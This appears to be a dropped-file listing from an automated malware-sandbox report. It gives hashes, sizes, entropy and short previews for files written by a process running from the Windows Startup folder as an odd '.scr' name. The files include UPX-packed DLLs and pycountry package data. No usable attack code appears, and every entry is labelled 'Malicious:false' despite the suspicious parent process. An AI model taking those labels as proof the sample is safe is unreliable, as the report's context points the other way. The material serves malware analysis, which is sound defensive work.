                                                                                                    SHA-512:7B34802BEE04E34B2F15022498FD01E687AB24CE2899C997756FCDE3DECA65896F33F71CB76100DDB379AA5E7234BFAE1E61B3AA4642D802F16B51A734A665BD
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".............@..p....P................................................`.............................................\...........................................................................p...8...........................................UPX0.....@..............................UPX1.........P......................@...UPX2................................@...4.24.UPX!.$....e<..9Y...@|...z..I......$".$.UGkw.f~V2.M.*.Xr..z..7.E^I.6..^kN`..`s...e.9@......Np....'TtT...Y.Kd.6s..^.v............].V......Y3|f.....F.xj..p$p.O..V.C.Q.\....'..Y..:.-z.cV..S.v..........Y.T. .R...>........P.7pe...s.B....!v...!.,G..9.....P.......B8d).e.v.].<..Np..r.....m.U.Ve...w.5M%.r.S......@......Y..&.._.B..o.=..W..}..eM..6p].2 .. .7L.t....lu..F..q....~.*\...uS9.$...L.....t.P..'-!.-...Y.#MF~2...^.;..........%...../V..I.S..:...#2l.c\.......n...Zf[-s
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35328
                                                                                                    Entropy (8bit):7.8443199864320015
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:Be51YBlVs68Eom3hYhqjdYUY3lHhYI95v/neKOSzCcsOmj5xpM:BG1wlJVglBYM/neKOSzCcsBVw
                                                                                                    MD5:071FB22AF9FDDCEC35F2F46D7E50B445
                                                                                                    SHA1:3CB34B13DA91DCD4F5FEB81B1970362D9D12A00D
                                                                                                    SHA-256:938629264AC38C9B8AFCA8E22753F8D68212FFDF9122476F4ED1549BDA638EE0
                                                                                                    SHA-512:6385F925EF7F2CCB33D64123C42E0BF6CF7B8652D7AEF6FC7147B1E0E2A917DF9C10C5BACD4F8443D41E9049578B2923940B501668CC7240313A9BCCF450919B
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."................P.... ................................................`.............................................`....................`..\...................................................P...8...........................................UPX0....................................UPX1......... ......................@...UPX2................................@...4.24.UPX!.$..-*g,.!.k.~...v...@..I......$ ..uF.i.....~.D`0.T.j.oHD;7v..}r@8..2|`r..$..!b.Xs...J,>...i>.!!m...;...9..?8..V.c).c/:.2..38.^..B....Z..1...jX78..1`G....o...2....7....3........e.../..@P.s..S..F*y..,.......@.`...E. ..8..^.Dkx.b....<1.0b.Kl}._.Ds..ds8sYHO....q...t..t..N|...w.....Z!~.4D.K......>.<...._..."F..B...i..8.M..K.Rh.:..!1fA...#9`...S!...v.x$u3u.Q.C.2.L.$.%.&..]!.bX3..W..|..%...].o..h.<.`.|.?.?1...h.c.4.;0.q..j.....+.`....9....<T..d......$7....
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29184
                                                                                                    Entropy (8bit):7.777589036672058
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:sCt0mTJXK9DK2aGpM+8M/PchJBEFvzF0jSU4x4GVEDb65p+LNWY0keVDS7BZa7gw:umEhatNM/PchJB27amUgbGCn+h0IFp0
                                                                                                    MD5:AF516679CBDCBBC532A91EB9741CDD82
                                                                                                    SHA1:CBD0395150109C4F891E0A0824E2EA425C217941
                                                                                                    SHA-256:A2712AECA7DB5B538266437EA28EC70FCF17391BF717D3EF59F7A77D51B18E43
                                                                                                    SHA-512:EFB2C3F88851539C15CFCF4C17BD908F59A15E17CC176ECF208D04CD07E70868688ED3D3ABBF2F0E6DF794E0CBBDF4A72C23FA43FE0E3E3D37DA4D1850E9C305
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....p...........]....................................................`..........................................q..\....p............... ...............q.......................................i..8...........................................UPX0....................................UPX1.....p.......l..................@...UPX2.........p.......n..............@...4.24.UPX!.$..}....C...>...]......I......$!VGPm..:f.......3.M.'.......P.~..Hn...e&.....c.J._$..G.C@......?:....r$.[.)V.%.~..}[..&+b.).B......0._!..z.?.}...~L.........+.B..A....6^M$.....h[.pE.......Z.@..^..?.'.n..&....F.p..v.{....%4.,......Q.a9?......V...!`-.k%..O.....(..l...J.z=.8UR.A<..u.....u..;.1.. i..<.....|WV`.T..rt.....L.!f...xI..V8^6S..j.5R.X.OP.XG...RH.PM%U. D.J.F...0@..._.....;.v.i..D.......w .O.....##.....U^.`...Th.BE..@...[{P.w.....0...J.G.C....^.[.5..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):63488
                                                                                                    Entropy (8bit):7.924414338074493
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:OfWplXd40Yt+BiADVRBWUem7lhDhCYN/LaJKMY2:Oy/EAD1Em7/gq/LuKT
                                                                                                    MD5:443A94A824ABB29B80D6A715EFB926AE
                                                                                                    SHA1:03F60522BC68FB2E1D3655392CB769F2FE29E72B
                                                                                                    SHA-256:34E34C604F3D8C20D3F759DB4344AEEA4780038BC8A153035BDD2754DD973910
                                                                                                    SHA-512:62B40FA3257CD3F1993ED5A75FBEB1889D37E77CFF12C795F2FFE6FEC821408DE2648A0ABA60DDD5C46DBA69B3CA34DB59437369E75F52AF87EB109837B2DC18
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."............. ..`....0...................................@............`..........................................1..l....0..................<............2..$...................................`...8...........................................UPX0..... ..............................UPX1.........0......................@...UPX2.........0......................@...4.24.UPX!.$.......<%*....8.......I...... ...p!..C..Gx(ET.SQ.....F....o\.]..P...f...d.p...i...*...`s..R"..|#w...+ER....AN.&=.......l.U..X-.....0.;.....!..2V0...v.h7R..9.E.~.ZJ.8..b .^..PX...s.j".....CsA..k..i.../%...4.cx5h.8...b.9.),.\_..J...7.....:Dy...>Kv...x..=2+...(.3.p.mY)...s.. .f.[u....#F.........h...:.....{.......$1zT.........`Z..K3F..t...a..L....j.X.9!....O.t.A..&3....R/....Y..M.).0.mK.J...wt..lL..G:..d}.SBRWS+..57..(*....r.8.~lL....yc".mL=...v{....8.tX..X.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):152064
                                                                                                    Entropy (8bit):7.981061374967017
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Czc+qoSEbZ/8NEL/RQIs2tIwKEf80qXq7NK2frOHhZzv7SB:5GJbZ/wELNshEk0qa7NK2jOHhB7u
                                                                                                    MD5:5B3380BD3D615B0C4A7F0E7BDD84EF9F
                                                                                                    SHA1:09A07BC5C4F5E27BE0024E5AC35D3A467432C24F
                                                                                                    SHA-256:F5E285E9AA0D4E0A8736030F2F4DEDC4D3DDDEA849E69AC39358F703CC8701E8
                                                                                                    SHA-512:D49D9F5FE1044E869E6C863894AC06FC7646584895B53405B2585B0D338B305D1C37609A67A4300C3125A546DA87E0A940BC0FE99A44635D43377EEEE50AE3D3
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....P...........'.......................................P............`..........................................A.......@...............................I.......................................3..8...........................................UPX0....................................UPX1.....P.......F..................@...UPX2.........@.......H..............@...4.24.UPX!.$..K.jF.......6......I..1... ...p!..C.#7.k.i..~."..3.9.N..).Gv.(3.B......./....L..1.!..]j....V.....F.|.N.H.z..^..{..=...\..H ....."S%+y..6{:.{../.w....&...?X*.n..EF.b..,.<..>..$. O.k.........*.n_.....A..u.{.6...+p^."yA..q.O.t.K.m..K.U.p?............lpbM!......J.5..R...)j.E...Q...)...-.2|.......y..G}(....|%DDn.'./.(.....q\.X;...j.{by....."[q.5Ci...i.n..0 .L.H).?..|.F....@X.... .L..;.j38...2.V.....0e....Q..`H..TG.ZE.....4.aLU.>`..0.X$n./.Y....G.r..D.PF
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32256
                                                                                                    Entropy (8bit):7.732584780831804
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:aH+VBc0PZjFjWNTkHoadOdIag6/wgHiOIhQqfwp6i6:++VBc0PZZjWNw3dOdIag6/fHiakV
                                                                                                    MD5:7C3B605ADA78BEC472664BBBC95FBA7C
                                                                                                    SHA1:F8168B5042D916222D8E9E78FF7868BA9608BB84
                                                                                                    SHA-256:9F08A32B403B7649287F237FC5F6A09BF442AE35B015F9A0B4100BD6E2E2626B
                                                                                                    SHA-512:8579FD179CD91C39A81C06ABA99C48A8E4E0392E9D649BC648E84EC397233DAD42D4CD5EA7247F466843D0D6C1393DF6225615F554506F24C47B558C44DAF315
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......nT..*5..*5..*5..#M2. 5..x@..(5..x@..&5..x@.."5..x@...5...k..(5..aM..;5..*5...5...@..:5...@..+5...@^.+5...@..+5..Rich*5..................PE..d...._.g.........." .................U....................................................`.........................................8u..`....p..H....p.......................u.......................................a..8...........................................UPX0....................................UPX1.............t..................@....rsrc........p.......x..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):1.5
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Mn:M
                                                                                                    MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                    SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                    SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                    SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                    Malicious:false
                                                                                                    Preview:pip.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24463
                                                                                                    Entropy (8bit):4.590677709301555
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:BE56OuAbn/0UVef6wFDVxnF+7xqsvLt+z/k8E9HinIVFkspWM9bc7ops0V:BE5trbernFCL1leSWmc7ksA
                                                                                                    MD5:8CF1799061BB2F68625332AB7039E11F
                                                                                                    SHA1:8ED581BF800FBEBD944EADF0735F8271E861F55B
                                                                                                    SHA-256:3FA39C6E18A3A4411082B64C164DEAE1D8F47B03A4D45304C1F0AE478626E382
                                                                                                    SHA-512:7DC3775C3865A0E4758EE888FC9CFFF2B2C9309D2CB8932654A98F18B74059CEE34CDFAF7309EB070370E0160AB1684083C97B01BDE3539F47335DFB24C6396B
                                                                                                    Malicious:false
                                                                                                    Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who decide to use
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:Unicode text, UTF-8 text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12984
                                                                                                    Entropy (8bit):5.178997433265721
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:FgACUZFUycrOOAYrX91Vdi5mM1B7Ix18w:jpFDZOAUX91Vd4XsF
                                                                                                    MD5:8A03E834A307C694DA27088FE5F689C4
                                                                                                    SHA1:82A3118108CD1CD77118EBB039930EA59556416C
                                                                                                    SHA-256:A2F8631A3B4830C3BB77E8BED4E373980D834D8092763A00F8F54E066D1BCD3D
                                                                                                    SHA-512:4E24E69988254DA46A0FF191E7B59BFA412DB0A065E38D776C7476FA463143BCF4E23A06EF3FA8FDA91F51040C9709607C019FB34AB7865D248024B0243ACC40
                                                                                                    Malicious:false
                                                                                                    Preview:Metadata-Version: 2.1.Name: pycountry.Version: 24.6.1.Summary: ISO country, subdivision, language, currency and script definitions and their translations.Home-page: https://github.com/flyingcircusio/pycountry.License: LGPL-2.1-only.Keywords: country,subdivision,language,currency,iso,3166,639,4217,15924,3166-1,3166-2,3166-3.Author: Christian Theune.Author-email: ct@flyingcircus.io.Maintainer: Nate Schimmoller.Maintainer-email: nschimmo@gmail.com.Requires-Python: >=3.8.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Intended Audience :: Information Technology.Classifier: License :: OSI Approved.Classifier: License :: OSI Approved :: GNU Lesser General Public License v2 (LGPLv2).Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: P
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):61680
                                                                                                    Entropy (8bit):5.865838990087134
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:jdp8gTmz1K4haFjGX16nvOb6mJqdNglxSLLgetzV9XcpX4nLZl4cll9KBXVFH79t:Bp8gTmz1K4h2s16nvOWmJqdNkxSLcet0
                                                                                                    MD5:4490A9DAF362CE120681ED50C45862C0
                                                                                                    SHA1:395DDDF3674B524B3045B2095D8C06E66D883AF8
                                                                                                    SHA-256:D3D443CF030B04DA9F1AE18BA56559CBA9990723A7A2A6ECA556A12FE8FE6896
                                                                                                    SHA-512:F9B0CF0091C6FC57EEB8B351DA18168658E3BF6E5FBB85C785C8C17A9DFBF6297E26328F01312CCC43838F3BE069C12438985D23042D4DC6E94F96B642B4FF92
                                                                                                    Malicious:false
                                                                                                    Preview:pycountry-24.6.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..pycountry-24.6.1.dist-info/LICENSE.txt,sha256=P6OcbhijpEEQgrZMFk3q4dj0ewOk1FMEwfCuR4Ym44I,24463..pycountry-24.6.1.dist-info/METADATA,sha256=ovhjGjtIMMO7d-i-1ONzmA2DTYCSdjoA-PVOBm0bzT0,12984..pycountry-24.6.1.dist-info/RECORD,,..pycountry-24.6.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..pycountry-24.6.1.dist-info/WHEEL,sha256=FMvqSimYX_P7y0a7UY-_Mc83r5zkBZsCYPm7Lr0Bsq4,88..pycountry/COPYRIGHT.txt,sha256=9LAWFwZLzZ6f49ti7Jxu-NCvzDiN2ljZspNaVR15YOQ,2054..pycountry/__init__.py,sha256=YLNhtu9WmoG-K6yDc3MwQFHlCk5o-kLiA6BfSdf65xE,10577..pycountry/__pycache__/__init__.cpython-312.pyc,,..pycountry/__pycache__/db.cpython-312.pyc,,..pycountry/databases/iso15924.json,sha256=Z009yLGKO5ma9xlvd5QopGXl-wr0FNBxlX0QNIvJgX4,17097..pycountry/databases/iso3166-1.json,sha256=8BuBK1f7qfMf9iG_M-fHVwoBlk2-tb4hZ-lN7PU4yJ8,43284..pycountry/databases/iso3166-2.json,sha256=Td3W3F6nzH26HuKJxlnJ
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):88
                                                                                                    Entropy (8bit):4.592717347960768
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:RtEeXLRkP+tPCCfA5I:RtLkWBB3
                                                                                                    MD5:61111EB62E29548402696F564FF890EE
                                                                                                    SHA1:AEC337A682FE358EF3A7A5C3B824A27F12C761D3
                                                                                                    SHA-256:14CBEA4A29985FF3FBCB46BB518FBF31CF37AF9CE4059B0260F9BB2EBD01B2AE
                                                                                                    SHA-512:DCFCB1CFEC454B713F1D21E6D5F0882B22B02CA358DD6439782C4BF9472D694958B818C7117A93BE01A186657105270735469AEB8ADEF8BE7FF2C757E6E32BC4
                                                                                                    Malicious:false
                                                                                                    Preview:Wheel-Version: 1.0.Generator: poetry-core 1.8.1.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (301)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2054
                                                                                                    Entropy (8bit):5.116955399685849
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:kVS6y/yZiGcRlBHp5TvMjAOw80k9+/yQCK+pFU:yy33BHplvMKgODSc
                                                                                                    MD5:86704A1F40D1CBC71637E42313B0D06D
                                                                                                    SHA1:9056B15F8C44BA08F5A8958721C9C21EDF303AD7
                                                                                                    SHA-256:F4B01617064BCD9E9FE3DB62EC9C6EF8D0AFCC388DDA58D9B2935A551D7960E4
                                                                                                    SHA-512:7DC5791FF8B2A887037814F35AC86FD2F915577891208ECEF4AFDAA5597B7AE2E64C8373456773DCAB89FFF57EBC14E662E5A198BCC3BA3EB54365CF68824A5E
                                                                                                    Malicious:false
                                                                                                    Preview:COPYRIGHT (c) 2008 - 2023, pycountry..Pycountry is free software; you can redistribute it and/or modify.it under the terms of the GNU Lesser General Public License as published by.the Free Software Foundation; either version 2.1 of the License, or any later version...This project is distributed in the hope that it will be useful,.but WITHOUT ANY WARRANTY; without even the implied warranty of.MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.GNU Lesser General Public License for more details...Contributors:.- Christian Theune (2008-2020, 2022).- Nate Schimmoller (2022-2023).- Zachary Ware (2016, 2023).- Alan Orth (2023).- Ashok Argent-Katwala (2020).- Bastien Vallet (2020).- Chris R Bunney 2020.- Christian Zagrodnick (2012-2013).- Christoph Zwerschke (2013).- Jakub Wilk (2020).- Janis Kirsteins (2019).- Justin Ryan Wagner 2014.- Kevin Deldycke (2014, 2016).- Louis Sautier (2020).- Lucas Wiman (2015).- Mario Vilas (2014).- Michael Howitz (2020).- Micha. Bielawski (2021, 2023)
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17097
                                                                                                    Entropy (8bit):4.130742675608694
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:RWfT+Ws91dwhw8KMiRcHBe+5/Bjv+PvFqZEj34SmqMrZNFdNbXt7WRj/kLNjhECU:Anu1dwi7She+MvFqz77XokLNjWH7
                                                                                                    MD5:58CA117D7B1F54C981AE3A91BE61CD7A
                                                                                                    SHA1:9B1D19A1F562498A70EE066B738F64B6DF97AD92
                                                                                                    SHA-256:674D3DC8B18A3B999AF7196F779428A465E5FB0AF414D071957D10348BC9817E
                                                                                                    SHA-512:205FF58BEB4142A91FF91B8DFC685265C648F75B6B9B4CD3FD9EE053DC9777DFF168A03776D965328FEB4A21BE1E027153FD3F96DC1DEBAA5F92F818D48666CD
                                                                                                    Malicious:false
                                                                                                    Preview:{. "15924": [. {. "alpha_4": "Adlm",. "name": "Adlam",. "numeric": "166". },. {. "alpha_4": "Afak",. "name": "Afaka",. "numeric": "439". },. {. "alpha_4": "Aghb",. "name": "Caucasian Albanian",. "numeric": "239". },. {. "alpha_4": "Ahom",. "name": "Ahom, Tai Ahom",. "numeric": "338". },. {. "alpha_4": "Arab",. "name": "Arabic",. "numeric": "160". },. {. "alpha_4": "Aran",. "name": "Arabic (Nastaliq variant)",. "numeric": "161". },. {. "alpha_4": "Armi",. "name": "Imperial Aramaic",. "numeric": "124". },. {. "alpha_4": "Armn",. "name": "Armenian",. "numeric": "230". },. {. "alpha_4": "Avst",. "name": "Avestan",. "numeric": "134". },. {. "alpha_4": "Bali",. "name": "Balinese",. "numeric": "360". },. {. "alpha_4": "Bamu",. "name": "Bamum",. "numeric": "435". },
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):43284
                                                                                                    Entropy (8bit):4.386184791738287
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:MnW9dpyPubqxU06BoCgwLlYdMRlAURLeG:ScRX
                                                                                                    MD5:E606BF70C68AA1C976A9913F9A518DC3
                                                                                                    SHA1:E75B56ADD2C5BC92078F921EF4F0970EA4F579E5
                                                                                                    SHA-256:F01B812B57FBA9F31FF621BF33E7C7570A01964DBEB5BE2167E94DECF538C89F
                                                                                                    SHA-512:55DC6592079561A4CC3C7E4A336ADFA26AC7D07AA96818F5E95F2784F8505113A87C5BB12C118C2F96EE3BE2E8AD5C1E6D3A6314B80DFD1E0D0E34648F65B316
                                                                                                    Malicious:false
                                                                                                    Preview:{. "3166-1": [. {. "alpha_2": "AW",. "alpha_3": "ABW",. "flag": "....",. "name": "Aruba",. "numeric": "533". },. {. "alpha_2": "AF",. "alpha_3": "AFG",. "flag": "....",. "name": "Afghanistan",. "numeric": "004",. "official_name": "Islamic Republic of Afghanistan". },. {. "alpha_2": "AO",. "alpha_3": "AGO",. "flag": "....",. "name": "Angola",. "numeric": "024",. "official_name": "Republic of Angola". },. {. "alpha_2": "AI",. "alpha_3": "AIA",. "flag": "....",. "name": "Anguilla",. "numeric": "660". },. {. "alpha_2": "AX",. "alpha_3": "ALA",. "flag": "....",. "name": ".land Islands",. "numeric": "248". },. {. "alpha_2": "AL",. "alpha_3": "ALB",. "flag": "....",. "name": "Albania",. "numeric": "008",. "official_name": "Republic of Albania". },. {. "alpha_2":
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):498094
                                                                                                    Entropy (8bit):4.1895799315712186
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:jLeCHHgSCdPl29cOdDX9+HqaS88SbKzZWv/d/Pjo:jyCHASCdPY9/DX9+HqnXSWzZWXx0
                                                                                                    MD5:D1F55B49FB379B4CBEE3F133CFE8F42A
                                                                                                    SHA1:C3C1252EA313A2DBBBB9CA4EE223407B613BC135
                                                                                                    SHA-256:4DDDD6DC5EA7CC7DBA1EE289C659C94C61D45813F0E5F797363DE28BF3E8E29A
                                                                                                    SHA-512:1FE58998C022D39571BB585DC7BD0F4674E9E04D9EF17AFA003BCA60B90F46D4D7518FBCD242707192F96F7E54910FEF4E05117EA2A78809845F7DB89655C371
                                                                                                    Malicious:false
                                                                                                    Preview:{. "3166-2": [. {. "code": "AD-02",. "name": "Canillo",. "type": "Parish". },. {. "code": "AD-03",. "name": "Encamp",. "type": "Parish". },. {. "code": "AD-04",. "name": "La Massana",. "type": "Parish". },. {. "code": "AD-05",. "name": "Ordino",. "type": "Parish". },. {. "code": "AD-06",. "name": "Sant Juli. de L.ria",. "type": "Parish". },. {. "code": "AD-07",. "name": "Andorra la Vella",. "type": "Parish". },. {. "code": "AD-08",. "name": "Escaldes-Engordany",. "type": "Parish". },. {. "code": "AE-AJ",. "name": ".Ajm.n",. "type": "Emirate". },. {. "code": "AE-AZ",. "name": "Ab. Z.aby",. "type": "Emirate". },. {. "code": "AE-DU",. "name": "Dubayy",. "type": "Emirate". },. {. "code": "AE-FU",. "name": "Al Fujayrah",. "type": "Emirate". },. {.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6193
                                                                                                    Entropy (8bit):4.48015328083314
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rSG73cDXbFr0IjXFz3fHG9wXcmDAUZUxg926wttHUU6VtUs92Dd92WeypZvOqUtg:uyuXWWtA0VtB+dmachNle7
                                                                                                    MD5:0960D396BD2C2CBE13E9049EA6C19674
                                                                                                    SHA1:423C07CCE12BA0FFABDA0B0FC620C1A5394058CB
                                                                                                    SHA-256:EB92D1CCE3E352559F610E60E2ACB23687EB1CF07B23675FB112863A5741A6FA
                                                                                                    SHA-512:2D97201FACB8C2E00933311AADFA4689DD64060E81472655DFA30D516538C6DF136F538777E9CB044AAC2A28A3B2CC021274C4F4DF4892B3714FD2F7DBCE9159
                                                                                                    Malicious:false
                                                                                                    Preview:{. "3166-3": [. {. "alpha_2": "AI",. "alpha_3": "AFI",. "alpha_4": "AIDJ",. "name": "French Afars and Issas",. "numeric": "262",. "withdrawal_date": "1977". },. {. "alpha_2": "AN",. "alpha_3": "ANT",. "alpha_4": "ANHH",. "comment": "had numeric code 532 until Aruba split away in 1986",. "name": "Netherlands Antilles",. "numeric": "530",. "withdrawal_date": "2010-12-15". },. {. "alpha_2": "BQ",. "alpha_3": "ATB",. "alpha_4": "BQAQ",. "name": "British Antarctic Territory",. "withdrawal_date": "1979". },. {. "alpha_2": "BU",. "alpha_3": "BUR",. "alpha_4": "BUMM",. "name": "Burma, Socialist Republic of the Union of",. "numeric": "104",. "withdrawal_date": "1989-12-05". },. {. "alpha_2": "BY",. "alpha_3": "BYS",. "alpha_4": "BYAA",. "name": "Byelorussian SSR Soviet Socialist Republic",. "numeric": "112",. "withdrawa
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16584
                                                                                                    Entropy (8bit):4.118485376665358
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:BhEPzaCs4uCZ2CPR/d5DmhmyfqPAbvGl/DGOPtm+Q6Deh9XcMk3YP4dGb:BhdCX7Z2eZdRmhDKAbO5BsygMMJAE
                                                                                                    MD5:E5ADBCBEFB7871CF0E8E9ADF2F08C759
                                                                                                    SHA1:335BD1C77F6D49B576CF6D99AC6953DE6898FADC
                                                                                                    SHA-256:C9C37B426317809A6FFE067DA3A334A3150F42494FAE91823557AFB7BD1A4135
                                                                                                    SHA-512:3DB28153A745048FE0023BE023E261C4C7374A2B14969D0E265BD6F90750C72ACD248685CD1930771748CBD9DB821A41BB72A707F0D30CB0913E324362A481D9
                                                                                                    Malicious:false
                                                                                                    Preview:{. "4217": [. {. "alpha_3": "AED",. "name": "UAE Dirham",. "numeric": "784". },. {. "alpha_3": "AFN",. "name": "Afghani",. "numeric": "971". },. {. "alpha_3": "ALL",. "name": "Lek",. "numeric": "008". },. {. "alpha_3": "AMD",. "name": "Armenian Dram",. "numeric": "051". },. {. "alpha_3": "ANG",. "name": "Netherlands Antillean Guilder",. "numeric": "532". },. {. "alpha_3": "AOA",. "name": "Kwanza",. "numeric": "973". },. {. "alpha_3": "ARS",. "name": "Argentine Peso",. "numeric": "032". },. {. "alpha_3": "AUD",. "name": "Australian Dollar",. "numeric": "036". },. {. "alpha_3": "AWG",. "name": "Aruban Florin",. "numeric": "533". },. {. "alpha_3": "AZN",. "name": "Azerbaijan Manat",. "numeric": "944". },. {. "alpha_3": "BAM",. "name": "Convertible Mark",. "numeric
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):874782
                                                                                                    Entropy (8bit):3.832192998289297
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:iC/NS9SasGfSl6yJlC3UHymIqovtupRWdVnEQMYvhesr5h7syqfsO7BJwdcQD/4J:oEFYbbQt
                                                                                                    MD5:FEE34FA2C17582310BFF6B93A6F7893D
                                                                                                    SHA1:444C3995B44B7C256D0165D1842DA152AEFFA261
                                                                                                    SHA-256:9636CE5266053867627140CE5ADA1F9AA897CA07A7501302C1B14B8D1147CDDA
                                                                                                    SHA-512:4CC1300E25739C18A0500C5CD04822330E57D24525BFFF94637BB17C696721727A356175D17EB77AD088E6F2A19765603EF460D5BCFEDFFFB13878972370B604
                                                                                                    Malicious:false
